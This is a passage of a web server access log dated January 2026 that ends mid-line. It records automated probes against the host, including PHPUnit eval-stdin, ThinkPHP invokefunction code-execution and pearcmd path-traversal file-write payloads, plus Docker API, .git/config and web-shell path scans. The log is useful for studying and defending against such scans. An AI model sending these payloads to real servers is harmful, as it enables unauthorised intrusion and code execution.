92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:25 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:25 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:26 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:26 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:27 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:27 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:27 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:28 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:29 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:29 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:30 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:30 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:30 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:31 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:31 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:31 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:32 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:32 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:33 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:33 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:34 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:34 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:35 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:35 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:35 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:14:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:07:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:10 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.246.116] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[13/Jan/2026:07:19:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:07:25:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:07:41:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[13/Jan/2026:07:41:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:07:50:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:08:08:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:10:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:08:14:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.101.146.132] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[13/Jan/2026:08:20:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:31:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 162.142.125.117] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:08:31:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.117] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:31:32 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:08:31:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.117] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:31:37 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 162.142.125.117] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:08:31:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.117] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:31:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:33:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:08:35:14 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 185.241.208.170] [Length 122] [Gzip 1.35] "Opera/9.80 (Android; Opera Mini/43.3.2254/150.36; U; en) Presto/2.12.423 Version/12.16" "-" +[13/Jan/2026:08:42:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:44:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:08:46:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:08:51:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:53:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:08:55:08 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 193.142.147.209] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:09:00:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:09:04:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 198.235.24.86] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[13/Jan/2026:09:24:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:09:27:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.93.251.137] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:09:31:02 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:09:37:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:09:45:34 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:09:46:36 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:09:50:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:09:51:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[13/Jan/2026:10:04:01 +0000] 400 - - http localhost "-" [Client 74.249.192.21] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:10:04:01 +0000] 400 - - http localhost "-" [Client 74.249.192.21] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:10:15:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:10:15:58 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1" "-" +[13/Jan/2026:10:23:54 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:10:27:38 +0000] 404 - GET http 92.249.249.197 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:10:29:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:10:39:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:10:45:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 35.203.210.136] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[13/Jan/2026:10:46:17 +0000] 400 - - http localhost "-" [Client 62.210.114.25] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:10:47:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:10:57:52 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:11:04:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:11:28:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:11:28:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:11:41:24 +0000] 405 - POST http 92.249.249.197 "/" [Client 95.214.55.246] [Length 154] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[13/Jan/2026:11:41:24 +0000] 404 - POST http 92.249.249.197 "/_next" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36" "-" +[13/Jan/2026:11:41:24 +0000] 404 - POST http 92.249.249.197 "/api" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:41:24 +0000] 404 - POST http 92.249.249.197 "/_next/server" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:41:25 +0000] 404 - POST http 92.249.249.197 "/app" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36" "-" +[13/Jan/2026:11:41:25 +0000] 404 - POST http 92.249.249.197 "/api/route" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36" "-" +[13/Jan/2026:11:41:25 +0000] 405 - POST http 92.249.249.197 "/" [Client 95.214.55.246] [Length 556] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:41:25 +0000] 404 - POST http 92.249.249.197 "/_next" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:41:25 +0000] 404 - POST http 92.249.249.197 "/api" [Client 95.214.55.246] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[13/Jan/2026:11:41:25 +0000] 404 - POST http 92.249.249.197 "/_next/server" [Client 95.214.55.246] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[13/Jan/2026:11:41:26 +0000] 404 - POST http 92.249.249.197 "/app" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[13/Jan/2026:11:41:27 +0000] 404 - POST http 92.249.249.197 "/api/route" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:11:44:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 156.226.170.175] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:11:44:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 156.226.170.175] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:11:48:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:11:55:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:12:01:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:12:16:11 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:12:19:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:12:20:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:12:26:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:12:31:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 104.199.46.221] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[13/Jan/2026:12:34:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 31.47.103.52] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[13/Jan/2026:12:42:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:12:54:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 159.203.70.73] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:12:54:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 159.203.70.73] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:12:54:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 159.203.70.73] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[13/Jan/2026:12:54:22 +0000] 404 - GET http 92.249.249.197 "/form.html" [Client 159.203.70.73] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[13/Jan/2026:12:54:23 +0000] 404 - GET http 92.249.249.197 "/upl.php" [Client 159.203.70.73] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[13/Jan/2026:12:54:23 +0000] 404 - GET http 92.249.249.197 "/t4" [Client 159.203.70.73] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[13/Jan/2026:12:54:23 +0000] 404 - GET http 92.249.249.197 "/geoip/" [Client 159.203.70.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[13/Jan/2026:12:54:23 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:12:54:24 +0000] 404 - GET http 92.249.249.197 "/1.php" [Client 159.203.70.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[13/Jan/2026:12:54:24 +0000] 404 - GET http 92.249.249.197 "/systembc/password.php" [Client 159.203.70.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[13/Jan/2026:12:54:24 +0000] 404 - GET http 92.249.249.197 "/password.php" [Client 159.203.70.73] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; 